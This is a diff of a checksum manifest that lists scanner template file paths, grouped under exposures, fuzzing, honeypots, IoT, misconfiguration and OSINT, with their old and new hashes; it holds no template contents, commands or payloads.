-http/exposures/files/wordpress-readme-file.yaml:9c56edbad130aa6bc6802f789cc82ee07634dc39 +http/exposures/files/wordpress-readme-file.yaml:aca59643574e916bcf896eb66ac87bb81f31c463 http/exposures/files/wp-cli-exposure.yaml:d9e27d25f01d5b26858e334947530ff034342ada http/exposures/files/ws-ftp-ini.yaml:30c413c6d9b9958236b7b821c6ecfbd5cf67cc43 http/exposures/files/xampp-environment-variables.yaml:0df2f0bc845b5ca2c25308ef4a648f4742ac6bc4 @@ -4927,7 +4927,7 @@ http/exposures/logs/jboss-seam-debug-page.yaml:c748e1d924b75944e21a3b926e6539736 http/exposures/logs/laravel-log-file.yaml:1c9256915860d67aabaccbb36beddf9f1eca7f63 http/exposures/logs/laravel-telescope.yaml:52ec6e31e7704b09600f0386dd049e77828ae0bc http/exposures/logs/lucee-stack-trace.yaml:467fad25796a3cd7ace8de52ce488d3b406b992b -http/exposures/logs/milesight-system-log.yaml:077224f3c73b08143ab293b7908603027c38c072 +http/exposures/logs/milesight-system-log.yaml:ca110048ffcd7a423e36d677e7a6a2fd7bb3385f http/exposures/logs/nginx-shards.yaml:c0f921f492ac11aac013022038971c3b584273d3 http/exposures/logs/npm-debug-log.yaml:9cd953efaaf59cf8e0ded9097c2ed6d8aeb33f0c http/exposures/logs/npm-log-file.yaml:5960e35dd675e419ce272dcc6569efc0f3f26762 @@ -5120,24 +5120,24 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9 http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735 http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb -http/fuzzing/cache-poisoning-fuzz.yaml:9b3803e001019b347c7c341a6faa42957ef9c2db -http/fuzzing/header-command-injection.yaml:0057de45d4ea4198aef13e374adc884c0fb33679 -http/fuzzing/iis-shortname.yaml:076ebc4308c00703f7de01876acb801812487af8 -http/fuzzing/linux-lfi-fuzzing.yaml:181fb146857877ba81442fa77596f53412f2f009 -http/fuzzing/mdb-database-file.yaml:8fb0cfbc5cfd824d294875264c0f08eb6d6f7931 -http/fuzzing/prestashop-module-fuzz.yaml:28329d1bc8e7144742004b76ad3874f88a95511e -http/fuzzing/ssrf-via-proxy.yaml:725dd4658bed49698144a8ef649e60dc07cbcf4f -http/fuzzing/valid-gmail-check.yaml:80f9fc7898a4bb813333e58efe72e303b3c98b44 -http/fuzzing/waf-fuzz.yaml:a91ed7d88c74c58b8ac0137df7582d4fd1a6d220 -http/fuzzing/wordpress-plugins-detect.yaml:b163fecb1fb43714f3b8cd947f5cb1072bbf6899 -http/fuzzing/wordpress-themes-detect.yaml:c4ca01cc3b526a7db6bb7da8dcc62bc1ed45f7de -http/fuzzing/wordpress-weak-credentials.yaml:993715640e6fafcd4e282872e66f2a67b055b4d9 -http/fuzzing/xff-403-bypass.yaml:7f137a010a5469b88fa1d56b17bceb04e5b176a5 -http/honeypot/citrix-honeypot-detect.yaml:d47879ae6f0be8622416d8e4b8c2447c9501718e -http/honeypot/dionaea-http-honeypot-detect.yaml:0f9298c4f6507013f66016059d6a43fa538be388 +http/fuzzing/cache-poisoning-fuzz.yaml:948f78ead7ac4fcd626851773d3e92a5d34e074f +http/fuzzing/header-command-injection.yaml:f126838d620d2991c09240ce267478409d12ae19 +http/fuzzing/iis-shortname.yaml:6fcd0689bd05133e0ee0e70291469662df9afa2e +http/fuzzing/linux-lfi-fuzzing.yaml:18a1e5d45eb60e189b788f1059d390abdfcc000a +http/fuzzing/mdb-database-file.yaml:7e47955452e3de00c6db4c1eb36d12625bbf444b +http/fuzzing/prestashop-module-fuzz.yaml:9b53a0dddc072c19a9bb504142a7405e29883dc6 +http/fuzzing/ssrf-via-proxy.yaml:8afda88ab1c4e1823cf8be3813fca2743b94838d +http/fuzzing/valid-gmail-check.yaml:b0a5afc5d5833a1aecfc1f70f75baebee197516c +http/fuzzing/waf-fuzz.yaml:1cb7427560f7725caad43f5ecd37f5175a59f396 +http/fuzzing/wordpress-plugins-detect.yaml:46285fcf9fa444ab8f34de44e710a9fb70cccee5 +http/fuzzing/wordpress-themes-detect.yaml:aa5f1df05015d61bd8947adf606462b54c4f63ac +http/fuzzing/wordpress-weak-credentials.yaml:cc584d6d11c17f1b9d3d20167e4e75a328385b66 +http/fuzzing/xff-403-bypass.yaml:16b6605b8adf1f00a9b31d824fb53fc507c62449 +http/honeypot/citrix-honeypot-detect.yaml:b8c4ecc46d1d178b0bcb1f35231ec05078b3491a +http/honeypot/dionaea-http-honeypot-detect.yaml:fa0a315a7abe1c51dd8d5d2f02f13ee66d610385 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa -http/honeypot/snare-honeypot-detect.yaml:65b624d59f5ff34d314ed47f73c8ea8d0d44a339 -http/honeypot/tpot-honeypot-detect.yaml:99630afc07dee451bf2c6fedbb585164d892c24f +http/honeypot/snare-honeypot-detect.yaml:18110db8bb5342e065a07aa525d595ac35d3a196 +http/honeypot/tpot-honeypot-detect.yaml:26d0b62f65aedc7d2ae400bfa21f2afd2614ec0e http/iot/ampguard-wifi-setup.yaml:3fdb76a85fa7376b4ddef9a2af7f4cfadd9db2fb http/iot/apc-ups-login.yaml:915c40c7c4e581a0636cc99d6d7ac0582f7da117 http/iot/automation-direct.yaml:9b578eb3fea63e67a0c939c9cce372e94ad3de19 @@ -5161,11 +5161,11 @@ http/iot/hue-personal-wireless-panel.yaml:bf80da1db76e38b21a79a2d1c1e606d0d8ae17 http/iot/internet-service.yaml:c9f1cf966aa3cfba926f26bc4d6c08f7420998a4 http/iot/iotawatt-app-exposure.yaml:9127c8ba9a2b0eb2fe9aa16d80e6c4db7e79b8cc http/iot/kevinlab-device-detect.yaml:f720c924dba7c3a9003b2bf59be19a243aaa4def -http/iot/kyocera-printer-panel.yaml:2f8fa73bd29061ddaf2e2b03a1c8e87ea56bf6d3 +http/iot/kyocera-printer-panel.yaml:e5565f4141df411b26e2b935e5777feebf6e07da http/iot/liveview-axis-camera.yaml:27770208bc0e8e6cb58a52f715f04451005ed271 http/iot/loytec-device.yaml:a9386283d6c5614c0f8af85d05651d2d98c89183 http/iot/mobotix-guest-camera.yaml:c01218a024c67546ad7ba633208ce64a985fb032 -http/iot/netgear-boarddataww-rce.yaml:44a5f8bea23fcac7a9fea75250b4ec590260f61b +http/iot/netgear-boarddataww-rce.yaml:5cd04abbaffeeff88eaaade0259e6fa95c857f9a http/iot/netsurveillance-web.yaml:bc37216eb766b14eb44c7450623e6b0be900a35e http/iot/network-camera-detect.yaml:75f24121124cf3a8e5aca711ec2f29d1d857fa39 http/iot/novus-ip-camera.yaml:f14cfb5cff0f616b430dd4fffcc09f8d725c78db @@ -5191,20 +5191,20 @@ http/iot/zebra-printer-detect.yaml:491a007c29769934e37fb4edfe93353464edaad6 http/miscellaneous/addeventlistener-detect.yaml:a9379004a7ea9f28a2cfe60e9d4ddeaec301278a http/miscellaneous/apple-app-site-association.yaml:0c900bfd50a6f29041445996ed33a94d75abe68d http/miscellaneous/aws-ecs-container-agent-tasks.yaml:8d29db7a82337344e379b72bce008157bd4df961 -http/miscellaneous/balada-injector-malware.yaml:b25cc0af2279ac69ab18bc6dffb3cd8fff924170 +http/miscellaneous/balada-injector-malware.yaml:5ff8c1835930dce07caff226eb470b1d2985785d http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 -http/miscellaneous/cloudflare-rocketloader-htmli.yaml:2f60681ddf3309e0eb345ad5a43659cbb594815c +http/miscellaneous/cloudflare-rocketloader-htmli.yaml:6632b45815fdec7291860fe508f2cccfe8a5a759 http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 -http/miscellaneous/defacement-detect.yaml:223568f7feb4a0207941d2ecd2864be96f5c4f27 +http/miscellaneous/defacement-detect.yaml:b85909968904618caf212f3d7de216f77b3a246b http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 -http/miscellaneous/directory-listing.yaml:c0c8be4336115438b99745fcbf4953e0e8836c14 +http/miscellaneous/directory-listing.yaml:f67313cd4aa9b63920e9ada705e8d2ca5d292c4c http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 http/miscellaneous/exposed-file-upload-form.yaml:64f23d5b8da7c59b3ec10f035ffe433f26f8d62d http/miscellaneous/external-service-interaction.yaml:55a5e41982df451d077107874414eca191585ba2 http/miscellaneous/firebase-database-extractor.yaml:fe5c0911b8c3dce233fda89c2b074bc4cfa0403c -http/miscellaneous/form-detection.yaml:03a52bb979b7a8a938d5bd682efcd277c67b8c7f +http/miscellaneous/form-detection.yaml:1aff84b41dfcd5a534eb153e8f4ccfe82c12320f http/miscellaneous/google-floc-disabled.yaml:ecc241b0d5827bfa352c70187b207bfc7250d944 http/miscellaneous/gpc-json.yaml:8e7f285ae1bbc8c256228b8e3b4b26075b5dfd27 http/miscellaneous/htaccess-config.yaml:ed1eded700cac491e2229e59f2e67cb05e79e290 @@ -5212,7 +5212,7 @@ http/miscellaneous/http-trace.yaml:bcf573df3cc054e8b8941963fcfca5a87bbf2af3 http/miscellaneous/joomla-htaccess.yaml:2cb861905f21740d8f8a27d71f7658e7926c9c66 http/miscellaneous/joomla-manifest-file.yaml:5e55465e13395a1e9c72323979f1078b4a585cc7 http/miscellaneous/maxforwards-headers-detect.yaml:574c7ca7130e895e14c9cdbb805760591011ddda -http/miscellaneous/microsoft-azure-error.yaml:acbfb88e12e68769b3d301a0cb2707240f7b7df1 +http/miscellaneous/microsoft-azure-error.yaml:0be080b5f0f4cb1bbdf53955a9f003a567d3aa02 http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43 http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0 http/miscellaneous/ntlm-directories.yaml:8d52b0df9375267f6ba7840037a48a96cb971dda @@ -5298,7 +5298,7 @@ http/misconfiguration/aws/aws-redirect.yaml:3eae321734d805abec1fdc57bb8d11050410 http/misconfiguration/aws/aws-s3-explorer.yaml:8ecb526ca030871303b3e3f0349edaf292f30f55 http/misconfiguration/aws/aws-xray-application.yaml:e7ec644ccf2a75882aeace1f7192b1bf5ba62db1 http/misconfiguration/aws/awstats-listing.yaml:ded98212b09190410c3fa3186d1fb106d0f1c07d -http/misconfiguration/aws/cdn-cache-poisoning.yaml:9e33fb0edc81bd01d17465fef726d792b1496043 +http/misconfiguration/aws/cdn-cache-poisoning.yaml:6b1769e1d2ee8e27348c5e024f0ae3335a82292e http/misconfiguration/bitbucket-auth-bypass.yaml:df9b1e0476b0f347aad3dfbfd8a5c1fde1cabc2b http/misconfiguration/bitbucket-public-repository.yaml:da10f49db5827358dc01a342a787f86e0ebc26d4 http/misconfiguration/blackbox-exporter-metrics.yaml:e1ea25cf9e00b6ea4778e8e91e0e1642a828ab88 @@ -5323,7 +5323,7 @@ http/misconfiguration/command-api-explorer.yaml:ab22381f1611d06739015ed9ed6d8762 http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b1b0fb3a0f16b90760a93b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51 -http/misconfiguration/corebos-htaccess.yaml:2b5a65fe11a6d881c1ff86d15b4c7d2100d1ca4a +http/misconfiguration/corebos-htaccess.yaml:01e578f80bbcf2552413ed4bf039cda8123fb19b http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce http/misconfiguration/database-error.yaml:dc9ac279976c76b9957baf5076fccd7722d1c9ce @@ -5336,14 +5336,14 @@ http/misconfiguration/deos-openview-admin.yaml:51a5586a8abec23b8177b2ab9a3bdfe9d http/misconfiguration/dgraph-dashboard-exposure.yaml:f78d8b451116601b9669874f446e1e0288c0200b http/misconfiguration/django-debug-detect.yaml:e7c45908268a0883ef221e205124b251307d5a64 http/misconfiguration/dlink-config-dump.yaml:a03aa2655a8a532b17f35a3359a8619cab72b3d2 -http/misconfiguration/dlink-unauth-cgi-script.yaml:96c79ffc2b1266ef3f3fad1ab32a5478cad13c46 +http/misconfiguration/dlink-unauth-cgi-script.yaml:6eef506085e8bb8b0918eb81a037c8e71a416e02 http/misconfiguration/docker-daemon-exposed.yaml:840bdb31f81cbeaa2b38bc57b6c1a51cc6007946 http/misconfiguration/docker-registry.yaml:5c7611723d46851a846d043b8fca50d505e5870f http/misconfiguration/docmosis-tornado-server.yaml:f1b6f28d042655fb76f80a329f1d252156dd1e88 -http/misconfiguration/dont-panic-traceback.yaml:d4dc7957fbb613b6a26456be141db3638bf33ce8 -http/misconfiguration/doris-dashboard.yaml:ac533787c4b5ce21be55590f95991ba68b6de0f2 +http/misconfiguration/dont-panic-traceback.yaml:94200c38eb8ee6b5ee23be19ff866152066274d7 +http/misconfiguration/doris-dashboard.yaml:915c562154d120249e963a6a07000c81e27592a2 http/misconfiguration/druid-monitor.yaml:730666deb48b9f1f6f12affc470425c39e0e9429 -http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:69e9b7dc67a0cfc50a3b955da17be96925d7fa74 +http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:36838e4026ed4d4f5d53f1c1b2a318a3bf2c7e16 http/misconfiguration/drupal/drupal-user-enum-redirect.yaml:2ebce6868f807bb1ebc41becb9583a2db7499164 http/misconfiguration/dynamic-container-host.yaml:4537d6cdaa991356fe13f32d4b8d47c8d771a2cc http/misconfiguration/ec2-instance-information.yaml:1f8a639965672728ca7148b729766c2428f1309b @@ -5364,13 +5364,13 @@ http/misconfiguration/exposed-service-now.yaml:6caed03d33008653ade2f82a74d9f12f9 http/misconfiguration/exposed-sqlite-manager.yaml:7f08ab3721ac74706849b5832190619910514591 http/misconfiguration/express-stack-trace.yaml:5d6a09415331603b6718bb7b766f90606672419b http/misconfiguration/feiyuxing-info-leak.yaml:8283a5c83d32a5290bfb243fa629e47e8aecdadf -http/misconfiguration/filebrowser-unauth.yaml:4813d29aa9f7ec3b16e4c89b5d2c9ea63d083d41 +http/misconfiguration/filebrowser-unauth.yaml:a888d5a22057e6a9bad36d051b74f2092ccc61ff http/misconfiguration/flask-redis-docker.yaml:884961c3e4b03b5cff631eae034ce3add285e676 http/misconfiguration/formalms-install.yaml:c81cf4919398991aef477d82b3ff17742f7d2280 http/misconfiguration/front-page-misconfig.yaml:43a1c8208f0ac3863a17fa06b8fe9c014fbf8a6a http/misconfiguration/fusionauth-admin-setup.yaml:a0bcf30e5ef642af46bb01a7135a26c24d894dfc http/misconfiguration/ganglia-cluster-dashboard.yaml:f08a3e1c593d51e030d3d0960a344332336967e3 -http/misconfiguration/genieacs-default-jwt.yaml:91fa5caa75e95c013fc03fca4a9078ab577461d0 +http/misconfiguration/genieacs-default-jwt.yaml:fd9bfaa4a2d814a6356b5db12f1ae25d9100e64b http/misconfiguration/git-web-interface.yaml:333bb590dfc56d41893147f01b0d0a01adaa4cc4 http/misconfiguration/gitea-public-signup.yaml:11e6176dc409205dd8e207f6f6abe01ef98103b0 http/misconfiguration/gitlab/gitlab-api-user-enum.yaml:d74d4349c1e6c0848273d86a5514e931566f6b09 @@ -5394,7 +5394,7 @@ http/misconfiguration/graphql/graphql-field-suggestion.yaml:e3980e92406e7b5a055f http/misconfiguration/graphql/graphql-get-method.yaml:351010e26b4c9e8537768bacab9488197d306486 http/misconfiguration/graphql/graphql-playground.yaml:24366b060558b81457a709e43493c49268d517b6 http/misconfiguration/grav-register-admin.yaml:af26649890037862b4b68606f2111ba6e301fa05 -http/misconfiguration/h2o/h2o-arbitary-file-read.yaml:4a1c533f314b0c900c99524399e6ac64a30a49c6 +http/misconfiguration/h2o/h2o-arbitary-file-read.yaml:134bc2a139f94be162e91660d0efe26a1ff7b4a9 http/misconfiguration/h2o/h2o-dashboard.yaml:7978671f956c5d5643432559f8571185103d7500 http/misconfiguration/hadoop-unauth-rce.yaml:c10cd550c98774bea2cc2bffaea35fdeed862768 http/misconfiguration/haproxy-exporter-metrics.yaml:e640ba6dd0c65cb0dfde519d3b32372b16f1ab63 @@ -5408,10 +5408,10 @@ http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611 http/misconfiguration/hpe-system-management-anonymous.yaml:82910902ebfef5f84f465fa13c5dcbd83572426a http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa3bb0bd1f2fc546006 -http/misconfiguration/https-to-http-redirect.yaml:b5ef7bb8b890031170e1bd6edc91149c54357ed3 +http/misconfiguration/https-to-http-redirect.yaml:fd969a923607a4913083ff38c08f2897e9ba5a4e http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 -http/misconfiguration/imgproxy-unauth.yaml:440549c41db83425d648c32a32693f9612586f94 +http/misconfiguration/imgproxy-unauth.yaml:17290c58c4487e0f2bb313179dcda02d62447789 http/misconfiguration/installer/activecollab-installer.yaml:842f496ce5d4b2c2dc3eed0109a75a5c2cd096a3 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 @@ -5443,7 +5443,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3 http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 -http/misconfiguration/installer/drupal-install.yaml:edc8b37ffe99eb114436c0f07433e315753765f9 +http/misconfiguration/installer/drupal-install.yaml:f25403398c09dffab42b6258504e110031ffba67 http/misconfiguration/installer/easy-viserlabs-installer.yaml:7ddea4c605e0c2129861c43f62aa0988f8883b51 http/misconfiguration/installer/easy-wi-installer.yaml:4d27fe3eb5f34b9a75dd2ca7f4213b7e400ba104 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 @@ -5451,7 +5451,7 @@ http/misconfiguration/installer/ejbca-enterprise-installer.yaml:b44ca7bfe9568e4f http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a -http/misconfiguration/installer/eyoucms-installer.yaml:b54fa1ec2de4e2b6ec98f4ef10bb6a310f801a83 +http/misconfiguration/installer/eyoucms-installer.yaml:41740038fcab8be1c3177a020ea423174893d57e http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea http/misconfiguration/installer/flarum-installer.yaml:b7ee710c481aa3675092568601ea31b522313b39 http/misconfiguration/installer/fleetcart-installer.yaml:dea791b407e94992fd22b6b781bffbdc07358fcb @@ -5459,12 +5459,12 @@ http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f054 http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e -http/misconfiguration/installer/gibbon-installer.yaml:005d67a353e9949e2a460eacc692543d61065073 +http/misconfiguration/installer/gibbon-installer.yaml:1e6c23423799256114a7ea8b405c9023e717da0e http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e http/misconfiguration/installer/glpi-installer.yaml:eff46c69565c0aea0245c4fde82e59b5e0fb2f00 http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d http/misconfiguration/installer/growi-installer.yaml:4deae8663c130d2b6fa7d6c62da70b3474c2efb3 -http/misconfiguration/installer/ids-skills-installer.yaml:93f8757caa90477270877e4313de70b234131bf7 +http/misconfiguration/installer/ids-skills-installer.yaml:f67abdf50395e0441167ec231be6dbb900f325ef http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 http/misconfiguration/installer/indegy-sensor-installer.yaml:deaa2d09c184bd9eee230c651699d1f1ccc8afcc @@ -5548,7 +5548,7 @@ http/misconfiguration/installer/tastyigniter-installer.yaml:e7cb6e7f2260190535a8 http/misconfiguration/installer/tautulli-install.yaml:babc01a81e184ecadb2cc433e7b0cdcc1195eb8b http/misconfiguration/installer/testrail-install.yaml:ffd3e6d389e273255f6e6b97ef617680c3336895 http/misconfiguration/installer/tiny-rss-installer.yaml:fffe28f654914f0e91b3afe7aeecd942d1fb1705 -http/misconfiguration/installer/trilium-notes-installer.yaml:f4055e7dfa39ac688805eca686704da18a4b667a +http/misconfiguration/installer/trilium-notes-installer.yaml:4e309acfeb2b50b05858604b924983f0eb1cbef2 http/misconfiguration/installer/turbo-website-installer.yaml:c860118d4335fffd299c32c8ccfd503ece02fd94 http/misconfiguration/installer/typo3-installer.yaml:316fc6ce687dbbdde1d1fe5bbff8b7224c7ed4d1 http/misconfiguration/installer/ubersmith-installer.yaml:d3f99788e31b13c9717ad3ae9040abdc29ae192a @@ -5569,10 +5569,10 @@ http/misconfiguration/installer/wowonder-installer.yaml:74af794a0e03a1bf19514d1d http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 http/misconfiguration/installer/xbackbone-installer.yaml:f5578c7d92a21b929a48e7a9569f6e00db6466b7 http/misconfiguration/installer/yzmcms-installer.yaml:cfd51c27e2bd7ce0dad274cf7d3d8a81519f6d74 -http/misconfiguration/installer/zabbix-installer.yaml:823a52e3108bc1d9cd3ed88e2e964ebd10e6f1a3 +http/misconfiguration/installer/zabbix-installer.yaml:4701db708e128a2510d8c8d1ee38676da47aca1e http/misconfiguration/installer/zencart-installer.yaml:4b3f6cc0c7a3fdf855d63035860f48020f1c602a http/misconfiguration/installer/zenphoto-setup.yaml:90123a5fbb91a4f9e860152c5f07d8a141669ed8 -http/misconfiguration/intelbras-dvr-unauth.yaml:640499595cdd35e6ffdeb2fb426b036ec1ca893e +http/misconfiguration/intelbras-dvr-unauth.yaml:cc9ea74a26ebdce90c7a31ba31de753ac153b72f http/misconfiguration/internal-ip-disclosure.yaml:ffb198989918d9f1e1cafafcd3470931ff6eaa4e http/misconfiguration/iot-vdme-simulator.yaml:c4c40ebfaba9239c6e0c5f14e6957533cdb11631 http/misconfiguration/jaeger-ui-dashboard.yaml:4584cce5677c777fcde741579d1ba52bccec4491 @@ -5616,7 +5616,7 @@ http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0 http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40 http/misconfiguration/mixed-active-content.yaml:488f8534a4929b8deb745780feea319f8d9decbd http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc -http/misconfiguration/mlflow-unauth.yaml:b84aecbba0837b70169a44784fc49bf9ffb747f9 +http/misconfiguration/mlflow-unauth.yaml:782c87a81f600d3dd2782e60f63080d361abbb93 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 http/misconfiguration/mobsf-framework-exposure.yaml:92bdcbddf11b0820a1a4bfefbf5eabe0f9497fab http/misconfiguration/moleculer-microservices.yaml:0d01170ea7ef5498c0c8a7f9dfa1e0b40eb6810c @@ -5633,7 +5633,7 @@ http/misconfiguration/nginx/nginx-status.yaml:6f1c76066dd1e6898769466b0e910d48d3 http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml:211971e71f621332570cac7a11bb0cfd5e4b1e87 http/misconfiguration/ngrok-status-page.yaml:1719155c2b18849b0089b0b6503cbb25c2004231 http/misconfiguration/node-exporter-metrics.yaml:4af5044a3d3f873774b6d4013eb22a0748fa6220 -http/misconfiguration/node-express-dev-env.yaml:ff004b9f2e0395fd39efa768030d1e2cbc7140f6 +http/misconfiguration/node-express-dev-env.yaml:2b82622170d1f0b5b63aeccfbf2afb9b2afc51de http/misconfiguration/node-express-status.yaml:798d45c3570f9292fba716a59a7f249f8235e3f3 http/misconfiguration/nomad-jobs.yaml:5b7785d839689ca51151726480c7d82e69db073b http/misconfiguration/ntop-panel-exposed.yaml:c66c9ffc95eb364b7ec1128e00cbc391742293cd @@ -5649,7 +5649,7 @@ http/misconfiguration/pa11y-dashboard.yaml:5698c9d2d4d65f5b37183950c6e2e6dda8e34 http/misconfiguration/pcdn-cache-node.yaml:1f6e94fb40627d4d5777cb0216ee6cce81f0b7ee http/misconfiguration/perfsonar-toolkit.yaml:17de04eb8c9775c51bfdc6f4c668f47d125bae8e http/misconfiguration/pghero-dashboard-exposure.yaml:10a596525bcca76216f10ea9c037361e97da3c65 -http/misconfiguration/php/php-composer-binary.yaml:c28c5c76684effd1fedf2f4086dbb1d989a89aa0 +http/misconfiguration/php/php-composer-binary.yaml:b3003447ca302f7c29e22e4b325fa3ac51eafe02 http/misconfiguration/php-debugbar-exposure.yaml:5dce013f553007ddaa4f1e39f67fc52de6ad1f8e http/misconfiguration/php-errors.yaml:71015100ca7b81f0d9e592cfd976622c8b532bc3 http/misconfiguration/php-fpm-status.yaml:033a35edfc98e280891a432cfe711cb5023757b8 @@ -5696,7 +5696,7 @@ http/misconfiguration/roxyfileman-fileupload.yaml:ed5188248f91ec32600369efa8f74e http/misconfiguration/s3-torrent.yaml:cb8cf43a0671794f2618c3cadc81a768a775d857 http/misconfiguration/salesforce-aura.yaml:855d650ee81f9e1640873673b7e7aaaf8a1f88f3 http/misconfiguration/sap/sap-directory-listing.yaml:b1ee926d8765bfc906fed9fa7224211ebea89f1d -http/misconfiguration/sap/sap-netweaver-info-leak.yaml:6cab8ecad2b68e1f85b6a44c60e96e9a79c03a18 +http/misconfiguration/sap/sap-netweaver-info-leak.yaml:9d9a430d691e32fe01163bf5646ef351d820fb53 http/misconfiguration/sap/sap-public-admin.yaml:a5b0b5a0784a3cefbd0a60462c9219cef2f84049 http/misconfiguration/searchreplacedb2-exposure.yaml:aa0f5a7fe0ab3a3831d42805d49202aed3c236f5 http/misconfiguration/secnet-info-leak.yaml:5f2028c717a06972b7c79f8651397eed3cbd5c37 @@ -5762,7 +5762,7 @@ http/misconfiguration/tcpconfig.yaml:6f639b73c6f31e54b1f215befb4505433c5e6809 http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml:db26f1c4a0ed26d77923e65f6532a587a87429f4 http/misconfiguration/teamcity/teamcity-registration-enabled.yaml:5765d86c79c32f47acfda74b19664788c69b5ea8 http/misconfiguration/teslamate-unauth-access.yaml:446a2240cd1f6c0de4961e997f7e09d2da4e8dc8 -http/misconfiguration/thanos-prometheus-exposure.yaml:e4b0fa01e327d294c8fba339211878ce91b7f914 +http/misconfiguration/thanos-prometheus-exposure.yaml:c3c9c18ea584686ea1b92c9e1f31af69eb5681ef http/misconfiguration/thinkphp-errors.yaml:f3ddd674ae9e75b7760f111edf8347d3babb994e http/misconfiguration/tiny-file-manager-unauth.yaml:022c4efede57b4b63e9e54ea86fc05b756100d69 http/misconfiguration/titannit-web-exposure.yaml:90a7e87de3dc02e6f213e29f4d6bce3359464041 @@ -5803,7 +5803,7 @@ http/misconfiguration/unauthenticated-zipkin.yaml:73f69a3db4803b395469ae1d03d6a8 http/misconfiguration/unauthorized-h3csecparh-login.yaml:52ba2425210b300862c20a149417b849615ac9e0 http/misconfiguration/unauthorized-plastic-scm.yaml:f0b988e5aa54ff9c9d233a6a15796cfdb4270569 http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml:eb1d62caa10228fd5847ef05c1ba56eef9756320 -http/misconfiguration/unigui-server-monitor-exposure.yaml:6e562ac2e30752e1773f2f6dd8f5b4b4a1aa5705 +http/misconfiguration/unigui-server-monitor-exposure.yaml:7df550b5bd5b37c61e6964752a68f0d72397a682 http/misconfiguration/untangle-admin-setup.yaml:48ca3177690a4ffd930faf99a443caade96231c7 http/misconfiguration/ups-status.yaml:e72e5c146b99b7efed8a61faf81517cc5f9e9736 http/misconfiguration/v2x-control.yaml:1e5196bc738b2850f7c29df0a9af5e933fde4e7f @@ -6363,7 +6363,7 @@ http/osint/user-enumeration/pikabu.yaml:232402913d7ecfe855b1e19bce0fb2a711b3458e http/osint/user-enumeration/pillowfort.yaml:1f95523e1bf01e9d92d3022d16b18d24e93d0ee6 